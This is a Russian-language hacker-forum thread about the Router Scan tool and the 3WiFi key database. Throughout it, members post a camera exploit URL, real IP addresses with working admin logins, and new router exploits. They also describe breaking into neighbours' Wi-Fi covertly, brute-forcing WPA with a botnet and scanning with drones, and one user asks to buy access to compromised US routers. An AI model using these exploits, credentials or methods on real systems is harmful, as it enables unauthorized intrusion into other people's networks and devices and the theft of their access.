если в ущерб роутерскану - народ не переживет такого коварства тем более, что переплюнуть роутерскан в популярности (и даже в международном признании...во как завернул...) тем проектам вряд-ли получиться

exzet
23.07.2017, 22:46
светить точки двух банков, мирового судьи



Позор таким банкам.

А как вы определили, что точка мирового судьи? У нее в имени так и написано MIROVOY_SUD'YA_RULEZ?

Кстати, если делаете громкие заявления, что программа лезет куда не надо или что-то делает странное, то предъявите пруфы.



Если так пахать, надолго вас не хватит



Основной запал кончается через 3-6 месяцев, а то и раньше. А потом уже мотивирует или финансовая составляющая или сообщество. Так что пускай пилит пока вдохновение есть

Kakoluk
23.07.2017, 22:59
Основной запал кончается через 3-6 месяцев, а то и раньше. А потом уже мотивирует или финансовая составляющая или сообщество. Так что пускай пилит пока вдохновение есть


Странно думать о человеке в контексте финансовой мотивации, если он сопровождает проект уж точно более 3-х лет(насколько я знаю, а я знаю не всё). Вы видимо не внимательны. Тут более приемлемо применить термин "упёртый" или "идейный". За что мы его(этого человека) и любим(без всякого сексуального подтекста). Ну есть такой парень, и его "запал" не кончился через 3-6 месяцев.

exzet
23.07.2017, 23:36
Kakoluk, я в общем смысле говорю, что когда написана большая часть того, что задумано, то через какое-то время рвение и первоначальный интерес угасает. А финансовая мотивация это всего лишь один(но не единственный) из примеров того, что может мотивировать автора дальше развивать проект. Но в данном случае, как мне кажется, мотивирует сообщество. Любому автору важно знать, что он старался не напрасно, и что его творение кому-то нужно и им пользуются.

binarymaster
23.07.2017, 23:39
Любому автору важно знать, что он старался не напрасно, и что его творение кому-то нужно и им пользуются.



Люто плюсую.



когда написана большая часть того, что задумано, то через какое-то время рвение и первоначальный интерес угасает.



Не могу спокойно смотреть на неотпарсенные устройства.

sha9
23.07.2017, 23:55
Странно думать о человеке в контексте финансовой мотивации, если он сопровождает проект уж точно более 3-х лет(насколько я знаю, а я знаю не всё). Вы видимо не внимательны. Тут более приемлемо применить термин "упёртый" или "идейный". За что мы его(этого человека) и любим(без всякого сексуального подтекста). Ну есть такой парень, и его "запал" не кончился через 3-6 месяцев.



binarymaster основной идейный вдохновитель и руководитель проекта...все что сказано-поддерживаю обоими руками. но справедливости ради нужно поблагодарить отдельно и тех, кто в тени например felis-sapiens, который (на сколько я понял) тоже принимает не последнее участие в разработке роутерскана...



Тут более приемлемо применить термин "упёртый" или "идейный"



скорее упорный, увлеченный и бескорыстный.несмотря на все предложения о введении оплаты не поддался искушениям. содержал свой сайт своими силами(пару лет назад), не имея достаточных средств...

Kakoluk
24.07.2017, 00:09
Kakoluk, я в общем смысле говорю, что когда написана большая часть того, что задумано, то через какое-то время рвение и первоначальный интерес угасает. А финансовая мотивация это всего лишь один(но не единственный) из примеров того, что может мотивировать автора дальше развивать проект. Но в данном случае, как мне кажется, мотивирует сообщество. Любому автору важно знать, что он старался не напрасно, и что его творение кому-то нужно и им пользуются.


Момент истины. Ради чего всё это затевалось?

- Доказать что все железки дырявые?

- Доказать что нет идеальных программистов?

- Или дело вовсе не в доказательствах(пруфах)?

- Или дело в "нужности" для публики?

Чёта я запутался вконец.

К чему стремится то?

Дайте уже направление. Жажду.

binarymaster
24.07.2017, 01:13
прошу пардонить, если баян.

эксплойт на айпикамеры JVC, также работает и на сименс. может и на других.не проверял.

http://IP/cgi-bin/readfile.cgi?query=ADMINID



Добавил.

sha9
24.07.2017, 01:14
Момент истины. Ради чего всё это затевалось?



тут уже один товарищ задавал аналогичные вопросы, на которые ответ имеют "только особо приближенные"



К чему стремится то?Дайте уже направление. Жажду.



к завоеванию мира

juart
24.07.2017, 01:31
Да тут попробуй полежать... устройства-то скидывают, кто сюда, кто в личку.

А мне бы ещё переключиться на пару проектов...


А можно так? Во-первых, отдохнув, конечно же, не переключаться на пару проектов? А доделать уберфичу? И во-вторых доделать 3wifi калькулятор (D-Link DIR-615, TP-Link, )? К сожалению я еще раз все проверила и перепроверила, чтобы никого не вводить в заблуждение, но пока уберфича ничего не взламывает. Она может только достать из базы 3wifi ключи ближайших сетей, если они УЖЕ есть в базе (shift+enter) или достать из реестра(ctrl+enter), если вы забыли затереть ключи там. ctrl+L это определение точки по геолокации, вы правы, но зачем это мне, я и так знаю, где нахожусь Увы, и обновленной справки нет, а для меня всегда мануал к любой программе, кот. я пользуюсь- это настольная книга.

exzet
24.07.2017, 01:38
Момент истины. Ради чего всё это затевалось?

- Доказать что все железки дырявые?

- Доказать что нет идеальных программистов?

- Или дело вовсе не в доказательствах(пруфах)?

- Или дело в "нужности" для публики?

Чёта я запутался вконец.

К чему стремится то?

Дайте уже направление. Жажду.


Я не знаю истории создания RS, возможно сначала это был просто сканер айпи, а потом туда добавились эксплоиты, а может быть и на оборот - на основе эксплоитов появилась идея собрать их вместе и автоматизировать процесс, и уже на основе этого появился RS. В любом случае об этом лучше расскажет binarymaster

А нужность, это уже как следствие готовой программы. Если нужность присутствует, то и автору интересно развивать свой проект, ну в большинстве случаев.

elkipalki
24.07.2017, 02:46
Добрый день.

Не по теме, но не нашел где еще спросить.

Тут есть люди у кого можно покупать доступы к рутерам? Интересует поднятые VPN или SSH на американских рутерах с читыми IP.

sha9
24.07.2017, 10:05
Добрый день.

Не по теме, но не нашел где еще спросить.

Тут есть люди у кого можно покупать доступы к рутерам? Интересует поднятые VPN или SSH на американских рутерах с читыми IP.



навряд-ли. тут обычно ничего не продают и не покупают. а сами что? вообще-то вопрос странный. если знаете , что такое впн и ссх,то наверняка знаете и как их подымать. это что, случаем не проверка на вшивость? и почему вопрос стоит именно в америке? анб запереживало?

заходите на 3wifi,находите америку. там туева хуча насканенных роутеров. поднимаете впн-ы на свой вкус,размер и цвет. и главное - бесплатно.

binarymaster
24.07.2017, 10:43
Момент истины. Ради чего всё это затевалось?



Не помню, рассказывал ли, но вкратце, всё началось с большой любви и D-Link DIR-300.



А можно так? Во-первых, отдохнув, конечно же, не переключаться на пару проектов?



Нельзя, все мои проекты требуют моего внимания.



А доделать уберфичу?



По мере постов в теме и личке, я дописываю, что пользователи (конкретно) хотят в ней увидеть. Версия 2.60 будет официальным релизом.



И во-вторых доделать 3wifi калькулятор (D-Link DIR-615, TP-Link, )?



Как именно его доделать? Если вам известны алгоритмы, которые не знает сообщество, делитесь.



Она может только достать из базы 3wifi ключи ближайших сетей, если они УЖЕ есть в базе (shift+enter) или достать из реестра(ctrl+enter), если вы забыли затереть ключи там.



Добавить туда что-то бОльшее затруднительно, ввиду ограничений Windows, и закрытых исходных кодов программ, которые могут.



Увы, и обновленной справки нет, а для меня всегда мануал к любой программе, кот. я пользуюсь- это настольная книга.



Уже говорил, в оф. релизе будет.



Тут есть люди у кого можно покупать доступы к рутерам?



Вам в торговые разделы форума.

Pebenok70
24.07.2017, 11:47
Посмотрите. Не парсит. https://77.66.157.100:8443/start.htm adminassword

http://31.172.135.121/webfig/ admin:

Определение

BMC Web Console http://78.41.109.44/page/login.html Отдаёт GoAhead-Webs

Felis-Sapiens
24.07.2017, 12:44
Правда логин/пароль чем-то зашифрованы:


USER_NAME="CAFOAGBLFM"
USER_PASSWORD="CAFOAGBLFM"




PHP:


[CODE]
[COLOR="#0000BB"]int sub_4012D0(constchar*ct,char*pt)

{
char*key="A:kr2a;1;sa;cn5pweA;SLKD;sldf2";
int i;
unsigned char b;



if (strlen(ct) >1000)

return -1;


memset(pt,0,501);

for (i=0;i[COLOR="#007700"]

binarymaster
24.07.2017, 12:47
Народ, если что, у меня рабочая неделя началась, выходные кончились.

Следующий стрик ближе к пятнице.

sha9
24.07.2017, 13:06
Народ, если что, у меня рабочая неделя началась, выходные кончились.

Следующий стрик ближе к пятнице.



дык сплойты еще выкладывать до пятницы, или уже задолбал?

juart
24.07.2017, 15:24
А тем временем, я добавил ещё один ASUS эксплойт CVE-2017-6549.

Но увы, этот RT-N16 к нему неуязвим. Только у firmware 2.0 есть шансы.

Откуда столько информации? Вы общаетесь с людьми, чьи точки добываете?

По-моему одно из важнейших правил вардрайвера - сосед не должен знать, что ты юзаешь его Wi-Fi. В идеале сосед вообще не должен знать о твоём существовании.


вместо того, чтобы добавлять что-то ненужное-лучше не торопиться и добавить что-нибудь нужное. это про эксплойт кот. не срабатывает. А знаю я про все, потому что беря роутер я как правило и когда есть возможность беру и устройства, что есть у жертвы В общем, с 59-й ночной не торопитесь, и кстати да, какая задача и вообще какие цели у программы все же?

juart
24.07.2017, 15:34
Позор таким банкам.

А как вы определили, что точка мирового судьи? У нее в имени так и написано MIROVOY_SUD'YA_RULEZ?

Кстати, если делаете громкие заявления, что программа лезет куда не надо или что-то делает странное, то предъявите пруфы.

Основной запал кончается через 3-6 месяцев, а то и раньше. А потом уже мотивирует или финансовая составляющая или сообщество. Так что пускай пилит пока вдохновение есть


а можно мои спойлеры оставлять под спойлерами? все остальное мы уже разобрали с автором программы, больше она никуда не лезет и уберфича выключена.

binarymaster
24.07.2017, 15:45
вместо того, чтобы добавлять что-то ненужное-лучше не торопиться и добавить что-нибудь нужное. это про эксплойт кот. не срабатывает.



Это конкретно на вашем ASUSе он не сработал, а вот на другом, найденном в Shodan - отработал отлично.

Ненужных эксплойтов не бывает.



В общем, с 59-й ночной не торопитесь, и кстати да, какая задача и вообще какие цели у программы все же?



Router Scan - сканирует роутеры. Цель следует из названия.

2.59 будет не раньше середины августа, это точно.

binarymaster
24.07.2017, 16:06
http://46.160.254.46:8080

http://178.167.75.185:8080



Неуязвимы.

Первый может быть и подвержен, но только когда туда админ зайдёт (такая особенность эксплойта).



я имею в виду, как вы конечно же поняли, не то, что программа делает вообще, а отдаленную цель и конечные задачи программы?



RS можно совершенствовать бесконечно - появляются новые устройства, открываются новые уязвимости. Прошивки и веб интерфейсы обновляются.

Да и просто новые идеи в голову приходят. Бескрайние просторы.

elkipalki
24.07.2017, 18:19
Добрый всем вечер.

Ищу человека, кто хорошо разбирается в теме рутеров и сможет выделить время, чтобы за деньги обучить правильному поиску и настройке под мои нужды.

Спасибо и извиняюсь за оффтоп. Просто в этой теме 100% есть тот, кто может мне помочь )

Суть вопроса: https://forum.antichat.ru/threads/453894/

carartem02
24.07.2017, 18:25
Первый может быть и подвержен, но только когда туда админ зайдёт (такая особенность эксплойта).



Там же rce есть, через неё никак нельзя добавить новую учтеку или что-то типо такого?

binarymaster
24.07.2017, 19:00
Там же rce есть, через неё никак нельзя добавить новую учтеку или что-то типо такого?



RCE там не по HTTP.

pwr2
24.07.2017, 23:15
Не парсит вот такую версию прошивок Thomson роутеров.

27.145.128.111 8080 265 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.129.175 8080 282 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.129.187 8080 266 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.129.251 8080 266 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.200.12 8080 406 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.200.83 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.200.124 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.200.193 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.202.195 8080 437 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.205.20 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.212.51 8080 438 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.221.76 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.221.211 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.250.106 8080 422 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.250.196 8080 438 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.251.20 8080 421 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

27.145.251.52 8080 437 Done adminassword Thomson/Technicolor, firmware: SC05.00.22

Версию Thomson/Technicolor, firmware: SC05.00.20 парсит. Не убейте.

muradddddd
24.07.2017, 23:28
Почему когда через роутер скан захажу в настройки

роутера в гугол хром выдает белые черные квадраты исправте пожалуйста.

muradddddd
24.07.2017, 23:29
Или как там выбрать другой браузер в роутер скане?

binarymaster
24.07.2017, 23:36
выдает белые черные квадраты



Текстуры не прогрузились?

Не уверен, что смогу исправить проблемы прошивок роутеров...



Или как там выбрать другой браузер в роутер скане?



В настройках и документации всё есть.

muradddddd
24.07.2017, 23:43
Да текстуры не прогрузились. Раньше все норма было когда admin admin выходил окошко а ша не грузит текстуры в гугл хроме

pkrw88
24.07.2017, 23:45
Да текстуры не прогрузились. Раньше все норма было когда admin admin выходил окошко а ша не грузит текстуры в гугл хроме



с хромоподобными браузерами такая же проблема и у меня, но, наверное, дело не в роутерскане, хотя хз

muradddddd
24.07.2017, 23:49
Через старую версию роутер скана пробывал зайти тож такая беда гугл хрома

binarymaster
24.07.2017, 23:53
Не парсит SC05.00.22



Теперь парсит.

Но вы не набрасывайтесь... я только с работы пришёл ^^)



Через старую версию роутер скана пробывал зайти тож такая беда гугл хрома



Давайте скриншот, посмотрим всей компанией.

(у себя такое встречал очень давно, из-за плохого сигнала вафли)

muradddddd
25.07.2017, 00:11
http://rgho.st/7nSqMFMVL вот вам скрин

binarymaster
25.07.2017, 00:18
http://rgho.st/7nSqMFMVL вот вам скрин



Это вообще-то не скрин, а фотография.

Понятно в чём дело. Отключайте автоматическую авторизацию при открытии роутера из RS.

Это особенность ASUS'ов и браузера Chrome.

muradddddd
25.07.2017, 00:21
А как отключить автоматичискую авторизацию?

binarymaster
25.07.2017, 00:23
А как отключить автоматичискую авторизацию?



Вы будете по каждой опции вопросы задавать?



В настройках и документации всё есть.

XAMRAS
25.07.2017, 12:26
А можно ли добавить в уберфичу выгрузку wifi точек которые у тебя в базу 3wifi?

binarymaster
25.07.2017, 13:47
А можно ли добавить в уберфичу выгрузку wifi точек которые у тебя в базу 3wifi?



Выгрузка сохранённых сетей - конечно неплохо, но она не содержит всей нужной информации для оптимального добавления в базу. В этом есть смысл только тогда, когда подключённая точка не парсится RS'ом.

Я недавно отвечал на подобный вопрос с такой позиции:



Возможно будет - уже есть функция определения IP/ISP, можно будет добавить авто-скан шлюза по заданным в списке портам (если сканирование ещё не запущено)




Однако, кто-нибудь обязательно воспримет это в штыки.



Отключите автовыгруз в принципе, это крайне опасная функция

Kevin Shindel
25.07.2017, 16:19
Обьясните назначение уберфичи?

Просто скан точек с целью поиска по ЕССИДу или маку в БД 3вифи?

binarymaster
25.07.2017, 16:51
Обьясните назначение уберфичи?

Просто скан точек с целью поиска по ЕССИДу или маку в БД 3вифи?



Несколько страниц назад:

https://forum.antichat.ru/posts/4108888

А вообще, мне изначально хотелось иметь удобную рилтайм таблицу с точками доступа в видимости, из которой удобно скопировать BSSID, ESSID, и прочее, не набирая netsh команд в консоли.

Плюс, было интересно распарсить данные WPS из Probe Response, часть которого, к слову, отдаётся из WlanGetNetworkBssList.

Ну и ещё, кто не догадался, накапливающий режим (Cumulative Mode) был задуман таким образом, чтобы, получая новую информацию о точках (в том числе строк из WPS), она не пропадала при последующих итерациях сканирования эфира. Dumpper так не умеет.

binarymaster
25.07.2017, 17:21
autoscan, autoupdate, etc - можно как-то пользователю самому решить нажиманием кнопки - надо ему оно или не надо?



В Router Scan нет ни одной автоматизированной функции, которую нельзя было бы отключить.



Я привыкшая КРАЙНЕ осторожно работать



Работайте как вам удобно на здоровье.

Только имейте ввиду, что автоматизация нужна, особенно когда необходимо работать быстро, можно сказать на бегу. Когда целевая точка доступна для сканирования всего 30 секунд, а то и меньше.

Пробежка с портативным устройством по местности, или полёт на дроне, понимаете к чему я клоню? RS постепенно превращается в реальное оружие.



и кнопка с опцией искать именно одну ЭТУ точку по маку, а не всё подряд барахло, расположенное ГДЕ-ТО-ТАМ на всех адресах возможных диапазонов.



Сканирование осуществляется по протоколу HTTP, почитайте документацию. Поиск по MAC в этой области - полный бред.

juart
25.07.2017, 17:26
Dumpper так не умеет.


вы так пишите, будто dumpper я лично кодила - нет, мне увы далеко до таких вершин мастерства, как и до RS . У dumpper другие две беды - он тупит на некоторых пинах, на кот. справляется 3wifi calculator и самая главная беда - программа пол-года не обновляется. Ну а все остальное в dumpper меня устраивает- анализатор пакетов, например, вся инфа о точке в общем и наглядном виде сразу без сохранения и с сохранением (в случае взлома) в файл, неплохо было бы конечно dumpper интегрировать в RS, думаю автор не против, если он(она) вообще жив

juart
25.07.2017, 17:42
Пробежка с портативным устройством по местности, или полёт на дроне, понимаете к чему я клоню? RS постепенно превращается в реальное оружие.

Сканирование осуществляется по протоколу HTTP, почитайте документацию. Поиск по MAC в этой области - полный бред.



нет, я не понимаю, к чему вы клоните на сей раз, наша с вами, извините за каламбур специализация, называется wardriving а не warrunning, бегать по местности с ноутом или даже с raspberry pi это уж как-то не мое дроны может лет через 5 сгодятся, когда они будут очень маленькие, как бабочки, тогда будет просто залететь в нужное окошко и пароль посмотретьпро оружие совсем не догнала, он же не уводит точку, не лочит с требованием выкупа за битки кстати может и зря А насчет мака что-нибудь придумайте, тогда RS точно будет оружием, еще каким. Ну а если это совсем полный бред- подумайте как автоматически добавлять пройденные ip в список фильтрации чтоб не шастать по ним еше и еще, вот тут auto как раз кстати, потому что не все догадываются, что даже в случае сканирования серых диапазонов все равно ip сортируются не сразу у провайдера и на день-два уже отсканированные следует фильтровать. Блин, спалила тему про то, как я нахожу много - ну ладно, спалила и спалила, я же ж жадная

binarymaster
25.07.2017, 17:50
бегать по местности с ноутом или даже с raspberry pi это уж как-то не мое


Ходить, бегать, ездить, летать - без разницы. Суть в том, что RS в кармане сам точки добывать сможет. Даже из кармана доставать не придётся, чтобы по кнопке кликнуть. А лишний раз девайсом светить не гоже.

Далеко не все сидят дома, окучивая ближайшие точки (но и здесь автоматизация иногда нужна).

Pebenok70
25.07.2017, 17:52
А с Huawei HG8245H как обстоят дела? Пароль 37.78.217.60:80 root:admin

Ещё, если имя сети русскими буквами, то RS пишет кракозябры.

stasstv
25.07.2017, 17:54
вы так пишите, будто dumpper я лично кодила - нет, мне увы далеко до таких вершин мастерства, как и до RS . У dumpper другие две беды - он тупит на некоторых пинах, на кот. справляется 3wifi calculator и самая главная беда - программа пол-года не обновляется. Ну а все остальное в dumpper меня устраивает- анализатор пакетов, например, вся инфа о точке в общем и наглядном виде сразу без сохранения и с сохранением (в случае взлома) в файл, неплохо было бы конечно dumpper интегрировать в RS, думаю автор не против, если он(она) вообще жив


Каждый инструмент по своему хорош и у тех кто "в теме", как правило, целый набор инструментов, каждый под свои задачи и со своими удобствами.

binarymaster
25.07.2017, 17:56
Пароль <not accessible> 37.78.217.60:80 root:admin



Потому что пароль недоступен:

http://image.prntscr.com/image/qrOj2Nq_S7K9U7T4Ksuadg.png

(звёздочки - не пароль)



Ещё, если имя сети русскими буквами, то RS пишет кракозябры.



Присылайте образец, это фиксится легко.

Pebenok70
25.07.2017, 18:05
Присылайте образец, это фиксится легко.



37.78.249.63:161

46.158.146.189:161

binarymaster
25.07.2017, 18:10
Может модеры все-таки поместят ссылку откуда брать последнюю версию программы в шапку(?)

Тут ссылки, конечно, мелькают на последних страницах, но все же

Или я ослеп?


https://forum.antichat.ru/posts/4103507/

V777
25.07.2017, 18:16
В 3WiFi можно карты яндекс сменить на гугл ?

binarymaster
25.07.2017, 18:23
В 3WiFi можно карты яндекс сменить на гугл ?



В теории возможно, на практике - пулл реквесты приветствуются.

(знаю, что Ядекс.Карты могут быть заблокированы... если обойдётся без переделки API, то было бы замечательно)

RomanxD
25.07.2017, 18:42
Хорошо, если можно было в колонке Key выделять все записи. Если их много, мышкой долго выделять.

binarymaster
25.07.2017, 18:47
Хорошо, если можно было в колонке Key выделять все записи. Если их много, мышкой долго выделять.



С Shift-ом должно работать.

juart
25.07.2017, 18:55
Ходить, бегать, ездить, летать - без разницы. Суть в том, что RS в кармане сам точки добывать сможет. Даже из кармана доставать не придётся, чтобы по кнопке кликнуть. А лишний раз девайсом светить не гоже.

Далеко не все сидят дома, окучивая ближайшие точки (но и здесь автоматизация иногда нужна).



да я и не сижу дома, а ближайших окучивать приходится постоянно все у нас шибко грамотные стали, пароли меняют чуть не ежедневно, в роутеры в свои ходят как в туалет - приспичило, поперлась во многом потому, что античат не закрытое сообщество, что вся инфа из ветки спокойно индексируется в гугле, а тут вон кое-кто мои спойлеры пооткрывал

binarymaster
25.07.2017, 19:02
все у нас шибко грамотные стали



В общем-то в этом нет ничего плохого, порой даже интересно посоревноваться, кто кого захватит.



вся инфа из ветки спокойно индексируется в гугле, а тут вон кое-кто мои спойлеры пооткрывал


Спойлеры тоже индексируются, проверял в режиме инкогнито.

V777
25.07.2017, 19:09
в роутеры в свои ходят как в туалет - приспичило, поперлась


Даже в инструкции это написано, ну это для тех кто читать умеет конечно . Античат тут причем ?)))

exzet
25.07.2017, 19:47
а можно мои спойлеры оставлять под спойлерами?



Информэйшн маст би фри



что автоматизация нужна



Предлагаю для этой мадамы запилить не автоматизированный RS, где она будет ручками считать диапазоны, ручками вбивать каждый айпи, и так же ручками парсить и юзать сплоеты. С ее запросами в 25 потоков будет самое то. Хотя зачем пилить, браузера будет достаточно.

juart
25.07.2017, 20:13
В общем-то в этом нет ничего плохого, порой даже интересно посоревноваться, кто кого захватит.

Спойлеры тоже индексируются, проверял в режиме инкогнито.



ну очень плохо, что индексируются, это ваш косяк, значит больше я ничего важного постить под спойлер не стану, только в ЛС. Но не всем

erwerr2321
25.07.2017, 20:27
Информэйшн маст би фри

Предлагаю для этой мадамы запилить не автоматизированный RS, где она будет ручками считать диапазоны, ручками вбивать каждый айпи, и так же ручками парсить и юзать сплоеты. С ее запросами в 25 потоков будет самое то. Хотя зачем пилить, браузера будет достаточно.



Не....

Ей в Болтанку надо! Срочно!

antis17
25.07.2017, 20:36
Почему-то плохо брутится ZyXEL. Может встать на каком-нибудь % и стоять до тайм-оут.

95.52.24.61:80 ZyXEL Keenetic Ultra II

juart
25.07.2017, 20:39
Кто? Твоя мама?


хамить то зачем, ну подкалывать ладно, а хамить я не разрешала. вот я никак не пойму, зачем я до сих пор здесь и что я здесь делаю вообще. Давайте я лучше удалю аккаунт и отсюда и с 3wifi раз такое дело.

juart
25.07.2017, 20:42
Не....

Ей в Болтанку надо! Срочно!


это вы тут такой смелый а в реале тоже? врать не буду мой муж не боксер и не киллер, но наказывать таких мудил любит за их длинный язык и делает это и жестко и жестоко всегда

erwerr2321
25.07.2017, 20:49
врать не буду мой муж не боксер и не киллер, но наказывать таких мудил любит за их длинный язык и делает это и жестко и жестоко всегда



Так а шо ж он тебе его не укоротил то до сих пор?!

Это он прощелил...

Ну или стало быть пиврёшь!

erwerr2321
25.07.2017, 20:54
хамить то зачем, ну подкалывать ладно, а хамить я не разрешала. вот я никак не пойму, зачем я до сих пор здесь и что я здесь делаю вообще. Давайте я лучше удалю аккаунт и отсюда и с 3wifi раз такое дело.



Уходя — уходи...!

exzet
25.07.2017, 21:03
это вы тут такой смелый а в реале тоже? врать не буду мой муж не боксер и не киллер, но наказывать таких мудил любит за их длинный язык и делает это и жестко и жестоко всегда



Ага, знаем мы таких альфа-самцов в интернете

http://galereika.org/_ph/115/199993587.jpg

TOX1C
25.07.2017, 21:35
у соседа, у кот. очень сволочная супружница, хорошо это ночью было днем эта змеюка опять пошла бы по квартирам выспрашивать у кого инет не работает, еще бы мусоров вызвала






все у нас шибко грамотные стали, пароли меняют чуть не ежедневно, в роутеры в свои ходят как в туалет - приспичило, поперлась



Это где такие звери проживают О_о ?

У меня из 500+ точек только на двух сменили пароль и отключили wps. На всех остальных пароли не меняют вообще никогда, а если и меняют, то только при смене роутеров. И то не всегда.

binarymaster
25.07.2017, 21:45
Почему-то плохо брутится ZyXEL. Может встать на каком-нибудь % и стоять до тайм-оут.

95.52.24.61:80 ZyXEL Keenetic Ultra II



На новых прошивках появилась защита от брутфорса...

erwerr2321
25.07.2017, 21:50
У меня из 500+ точек только на двух сменили пароль и отключили wps.



И это лет за 5 точно... ну точно же

TOX1C
25.07.2017, 22:38
И это лет за 5 точно.



За 3 года. И это случаи именно запала постороннего устройства в сети.

Все остальное во внимание не бралось: сети в кафе, сбивание настроек роутера с перенастройкой, настройка ненастроенного роутера, замена на другой.

Если с ними - 50 или 70 точек из 800+

Hose12
25.07.2017, 22:46
Немного лирики.

Вот однажды ведь настанет день когда все производители будут выпускать роутеры с железобетонной защитой.

Тенденция уже к этому есть я так понимаю.

Меня пугает, что однажды запустив RS, - я мало что увижу...

mamoru
25.07.2017, 23:06
ну очень плохо, что индексируются, это ваш косяк, значит больше я ничего важного постить под спойлер не стану, только в ЛС. Но не всем


Лучше никуда не пиши, твои сообщения в общей их массе бесполезны и напоминают бред сумасшедшего. Мешают читать раздел и изучать тему.



хамить то зачем, ну подкалывать ладно, а хамить я не разрешала. вот я никак не пойму, зачем я до сих пор здесь и что я здесь делаю вообще. Давайте я лучше удалю аккаунт и отсюда и с 3wifi раз такое дело.



В интернете часто кто-то не прав. Давай - действуй!



это вы тут такой смелый а в реале тоже? врать не буду мой муж не боксер и не киллер, но наказывать таких мудил любит за их длинный язык и делает это и жестко и жестоко всегда



Не пропала зря книга Питера Пена "как вычислить по IP и набить хлебальник"

pkrw88
25.07.2017, 23:35
Немного лирики.

Вот однажды ведь настанет день когда все производители будут выпускать роутеры с железобетонной защитой.

Тенденция уже к этому есть я так понимаю.

Меня пугает, что однажды запустив RS, - я мало что увижу...



Этот день если и настанет, то довольно нескоро. Особенно это касается китайских железяк за 300 р/мешок, для которых нанимать программиста, отличного от студента, работающего за тарелку риса в день, не очень рентабельно. Времена идут, а дыры проявляются. Даже у Cisco. Не говоря уже о CPE роутерах, которые втюхивают провайдеры.

Kevin Shindel
26.07.2017, 00:20
да я и не сижу дома, а ближайших окучивать приходится постоянно все у нас шибко грамотные стали, пароли меняют чуть не ежедневно, в роутеры в свои ходят как в туалет - приспичило, поперлась во многом потому, что античат не закрытое сообщество, что вся инфа из ветки спокойно индексируется в гугле, а тут вон кое-кто мои спойлеры пооткрывал


Shawn1x залогинся....

antis17
26.07.2017, 01:28
Этот день если и настанет, то довольно нескоро.



Уже сложности начинаются. До этого стояли роутеры от Ростелекома с паролями телефонов, или с включенным WPS. Пины генерировались или подходили (46264848, 76229909). А теперь меняют на HUAWEI-XXXX с отключенным WPS и 8 значным паролем (цифры, маленькие и заглавные буквы), да и извне Ростелеком не просканить. Многие подключены к Ростелекому, и роутерскан с ними можно сказать, становиться бесполезен.

startless
26.07.2017, 03:22
Похоже, тут черная кошка перебежала всем дорогу. Флудит бесконечно. Предлагаю игнор, чтобы не замусоривать тему. Ибо конструктива ноль, а все уже давно перешло на личности... ИМХО

Veil
26.07.2017, 12:50
Давайте я лучше удалю аккаунт и отсюда и с 3wifi раз такое дело.



Испугала Ежа голой задницей!

Ossen
26.07.2017, 12:55
А теперь меняют на HUAWEI-XXXX с отключенным WPS и 8 значным паролем (цифры, маленькие и заглавные буквы), да и извне Ростелеком не просканить. Многие подключены к Ростелекому, и роутерскан с ними можно сказать, становиться бесполезен.



Насчёт HUAWEI согласен их становится много как грязи, сканил Росстелеком Северо Запад если и отображаются то или без мака или пароля сети. и старичков д линков почти не осталось, Зато камер много находить стало

antis17
26.07.2017, 13:19
Насчёт HUAWEI согласен их становится много как грязи, сканил Росстелеком Северо Запад если и отображаются то или без мака или пароля сети. и старичков д линков почти не осталось, Зато камер много находить стало



В локалке инфу с HG8245 нормально достаёт, а по внешнему диапазону они закрыты.

TOX1C
26.07.2017, 14:43
теперь меняют на HUAWEI-XXXX с отключенным WPS и 8 значным паролем (цифры, маленькие и заглавные буквы), да и извне Ростелеком не просканить



У меня huawei с небрутабельными паролями лет 5 назад начали ставить. Причем не 8 цифр, а все 13 букв (wep key, но защита wpa2). WPS не включен. Как не ломалось, так и не ломается.

Лет 10 назад всем wpa жить мешал. Если точка закрыта не вепом, лезть к ней бесполезно. Побрутить дни рождения и клички собак, да и все.

8 цифр, которые сегодня брутятся за 15 минут, брутились тогда днями. Двухядерные корки брутили 1000 ключей в секунду.

Так же и эти 8 знаков микс, брутятся долго, но сбрутить можно. На впасек один раз кто то встал ботнетом, и брутил на скорости 38М ключей в секунду.

А со вскрытым алгоритмом и брутить не надо. Сгенерировал пароль за секунду, и пошел. Обычно sha, des или md5 от мак адреса и иногда серийника, иногда самописный блочный шифр. Европейцы ломают сети так.

erwerr2321
26.07.2017, 22:51
PPPoE?

erwerr2321
26.07.2017, 22:54
Расширение для мозиллы unhide passwords как вариант борьбы со звёздной болезнью



в данном случае:

type="password" => type="text"

без всяких расширений! Только зачем?

binarymaster
26.07.2017, 23:13
в данном случае:

type="password" => type="text"

без всяких расширений!



Длинноскрипт в консоль:

[CODE]
for(var i = 0; i

exzet
26.07.2017, 23:20
спасибо(без иронии).это -то понятно. но вопрос не во мне. вопрос в роутерскане. чтобы пофиксить это дело.



Ну я не особо следил за тем, какие сплоиты добавлялись, а в сорцах этого нет. Вот и кинул - вдруг пригодится.

sha9
26.07.2017, 23:24
Ну я не особо следил за тем, какие сплоиты добавлялись, а сорцах этого нет. Вот и кинул - вдруг пригодится.



знания лишними не бывают.конечно пригодится...

Kakoluk
27.07.2017, 01:18
У меня huawei с небрутабельными паролями лет 5 назад начали ставить. Причем не 8 цифр, а все 13 букв (wep key, но защита wpa2). WPS не включен. Как не ломалось, так и не ломается.

Лет 10 назад всем wpa жить мешал. Если точка закрыта не вепом, лезть к ней бесполезно. Побрутить дни рождения и клички собак, да и все.

8 цифр, которые сегодня брутятся за 15 минут, брутились тогда днями. Двухядерные корки брутили 1000 ключей в секунду.

Так же и эти 8 знаков микс, брутятся долго, но сбрутить можно. На впасек один раз кто то встал ботнетом, и брутил на скорости 38М ключей в секунду.

